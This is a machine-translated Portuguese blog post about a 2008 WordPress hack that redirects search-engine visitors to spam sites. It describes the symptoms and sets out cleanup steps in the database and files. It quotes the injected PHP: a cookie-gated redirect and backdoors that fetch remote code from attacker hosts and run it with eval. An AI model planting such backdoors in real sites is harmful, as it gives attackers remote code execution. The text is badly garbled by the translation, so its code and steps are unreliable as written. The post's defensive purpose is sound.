WordPress Corte: Recuperar e Afixar Google e Engenho de pesquisa ou N�o Biscoito Tr�fico Redireccionar para Seu-Needs.info, AnyResults.Net, Dourado-Info.net e Outro Ilegal Locais

Picareta est�o a ir todos ausente para corte e acto de hero�smo WordPress blogs albergue completamente encerrado a Web, sementeira e injec��o malicioso c�digo para WordPress c�digos e base de dados a fim de redireccionar visitantes e pancadas de Google e outro engenhos de pesquisa para spam locais tais como seu-needs.info, anyresults.net, dourado-info.net, keymachine.de, beliy.us, seogoogle.us e muitos outro spam locais que preenchido com pagar- por- clique CPC an�ncios. Algum corte aparece para alvo maior do que multid�o por redireccionando todos sem WordPress biscoito. Sem sido picareta, estas tr�fico imaginar atingir � blog como destino.

Ind�cios do Engenho de pesquisa Redireccionamento Corte

Nota que nem todos ind�cios maio acontecer completamente. Talvez haja mais do que um m�todo de cortes exist�ncia, que contribuir para diferente achando e poss�vel resolu��o.

• Qualquer clique atrav�s de de engenhos de pesquisa tais como Google, Yahoo, AOL, MSN, Janelas Viver procurar resultados, incluindo blog nome, ser� redireccionar e enviado para picareta’ locais tais como seu-needs.info, anyresults.net, dourado-info.net, keymachine.de, beliy.us, seogoogle.us, com o lista certo crescer. Espectador chega � picareta p�gina com o mesmo procurar cadeia que ele ou ela costumava procurar em engenho de pesquisa.
• Clique numa liga��o ao blog sobre RSS alimentar leitor tais como Google leitor pode ser redireccionar para picareta local demasiado.
• UM visita sem quaisquer conta no blog, ou n�o l�gica ( consequentemente n�o tem biscoito detectado por malicioso c�digo), ser� redireccionar para spam locais.
• Apenas visitas de engenho de pesquisa s�o sido redireccionar afastado, e a manha administrar enganar em torno de possivelmente muitos bloggers, webmasters e local propriet�rios, ou pelo menos atraso a detec��o do problema.
• Repente enorme e dram�tico gota e perder de colossal montante de visitantes tr�fico e p�gina perspectivas em web caminho estat�sticas, especialmente tr�fico com Google como referido a, apesar de engenho de pesquisa resultados classifica��o � intacto.
• Maci�o gota de anunciar impostos de Google AdSense ou outro an�ncios rede, ou associado autoriza��es.
• O seguindo base codificado PHP c�digo maio aparecer no wp-blog-header.php ficheiro:

  <?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ como $ref) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref((($[])$)!==errado){ $ser1=”?;partir; }
se && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”);sair; }? >

• Uma imagem, que � de facto um grupo de malicioso PHP c�digo, foi adicionado ao wp- conte�do/ enviar direct�rio. Por exemplo, wp- conte�do/ enviar/2008/06/06/abcdefghijklmn.jpg, ou esteja dentro seu tema arquivador, i.e. wp-contents/themes/classic/images/xyz.jpg. O nome da imagem pode ser no formato de xxxxxx_old.jpeg.
• Um entrada era inserido em MySQL base de dados para WordPress wp_options atirar a imagem ( o malicioso PHP c�digo) como obturador, tipicamente como rss_f541b3abd05e7962fcab37737f40fad8.
• Talvez haja tamb�m malicioso c�digos, especialmente aquelas que interpretar com analisar() ou base64_decode() comando sido inserido para outro WordPress PHP ficheiros. Exemplos s�o os seguintes c�digos:

  ifisset_GET'p'(($[])) {
$meia = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($ meia, ‘ obter http:/km20725.keymachine.de/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($ meia, ‘ dono de casa: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($ meia));
$conte�do = implorar(”, $ conte�do);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($ meia);}
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  evalgzinflatebase64_decode(((

• WordPress tema isto � sido activado e utilizado pode ser injectar com corte c�digo e afectado demasiado. Tal c�digo normalmente existe em header.php ou index.php do tema, e tem um linha id�ntico ao abaixo

  ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:

O WordPress procurar tr�fico redireccionar para spam local corte acontecer possivelmente devido a seguran�a buraco e vulnerabilidade que n�o seja afinado quando blog propriet�rio decidir para n�o actualiza��o para �ltima vers�o de WordPress ( embora algumrelat�rios que o seu blogs sido picareta apesar de o seu’ j� no �ltima vers�o de WordPress 2.5.1). Qualquer que seja porqu�, aqui’ o conserto e solu��o resolver e derrota o corte para garantir que a ti pr�prio costas o tr�fico e contornar sido penalized por Google por irracional redireccionando para spam p�ginas.

1. Fazer c�pia de seguran�a o WordPress base de dados.
2. Usar phpMyAdmin para folhear WordPress MySQL tabelas de base de dados. Deitar wp_options mesa, e de seguida editar a linha nomeado active_plugins. A linha detalhes todos activo obturador que tem sido activado. Atravessar a enumera��o ( num linha), e procurar um um obturador nomeado terminaram em com uma imagem alargamento, tais como .jpg, .jpeg, .gif e etc. Por exemplo, abcdefgh_old.jpeg. Anote o atalho ao ficheiro de imagem.
3. Usando sFTP ou SSH ( esquecer sobre FTP ou Telnet para seguran�a), depois navegar ao via do ficheiro, e apagar o ficheiro.
4. Deitar WordPress Administrador Obturador painel, desactivar ou activar qualquer obturador para limpo desligado o malicioso obturador da “active_plugins” linha.
5. Costas para phpMyAdmin, � wp_options mesa, arranjar um emprego linha que cont�m o seguindo cadeia como option_name:

   rss_f541b3abd05e7962fcab37737f40fad8

   Apagar a linha afastado.

   Se a ti dont’ saber como executar a base de dados asseado detalhado em medidas acima, aqui’ um v�deo tutorial:

6. Deitar wp_users mesa. Se houver um sem nome utilizador ( inv�lido valor em user_nicename campo) criado em 000000:: sobre 0000-00-00, anote o utilizador BILHETE DE IDENTIDADE ( bilhete de identidade campo, muitos). Apagar o utilizador.
7. Folhear o wp_usermeta mesa. Localizar todos linhas com utilizador correspond�ncias o BILHETE DE IDENTIDADE do apagar ilegal utilizador. Existem normalmente tr�s linhas sido associada ao invasor utilizador Bilhete de identidade. Apagar todos os associada linhas.
8. L�gica ao servidor editar o tema ficheiros, ou folhear o tema ficheiros’ c�digo em Tema Editor de WordPress Administrador Design painel. Verificar o header.php e index.php para qualquer suspeito c�digo. Como mencionado acima, procurar alguma coisa id�ntico ao linha abaixo:

   ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:

   Se achado, apagar e remover o c�digo. Repare que o malicioso c�digo ser� v�rios linhas comprido em total.

9. Se o seu’ n�o j� exist�ncia, criar um vazio index.html ficheiro na wp- conte�do/ obturador direct�rio. O em branco index.html esconder o conte�do da caixa obturador direct�rio, efectivamente escudo que obturador-ins sido utilizado de picareta endurecer e apertar o WordPress seguran�a.
10. Enviar e substituir cada e todos WordPress ficheiros ( n�o s� wp-blog-header.php) no servidor com o fresco, asseado, e original�ltima vers�o de WordPress (certamente, excepto pouco ficheiros tais como wp-config.php e temas). Se seu’ aprimoramento, lido oguia cuidadosamente.
11. Trocar seu senha.
12. Se tiver m�ltiplo utilizadores, trocar seus senha ( ou perguntar eles pedirem trocar a senha) demasiado.

importante: Isto � um engenho traduzido p�gina que � fornecido " como �" sem garantia. Engenho tradu��o pode ser dif�cil de fazer comprender. Queira por favor consultar ooriginal Ingl�s artigo sempre que poss�vel.

Ac��o e contribuir ou obter apoio t�cnico e ajudar emMeu Digital Exist�ncia Confer�ncias.

Artigos relacionados

• Adicionar NoFollow Relacionamento para WordPress Blogroll incrementar Mensageiro
• WordPress Obturador: Exibir Google Anal�tica e FeedBurner Relat�rios Estat�sticas de Local Admin
• Technorati Chegado Concatena��es Obturador para WordPress
• UM Espreitadela Em Google Mercador Procurar
• Como evitar, Ultrapassar ou Fuga Google Areia
• SEO Amigavelmente Reescrever M�todo deslocar Websters URL De Subdirect�rio para Origem M�e Arquivador
• Conduzir Mais Tr�fico utilizando Imagens
• Ask.com Engenho de pesquisa An�lise por CNNMoney
• Integrar e visualizar Google AdSense para Procurar e Cia-Op Alf�ndega Engenho de pesquisa Resulta em WordPress Blog P�gina Modelo
• Que Engenho de pesquisa � o melhor e A maioria Relevante?

Esta entrada era mala postal na Ter�a-Feira, 10 de Junho, 2008 em 103: sou e � arquivado sobWeblogs. Pode seguir qualquer respostas para este entrada atrav�s de oRSS 2.0 alimentar Podesair um resposta,ou trackback do seu pr�prio local.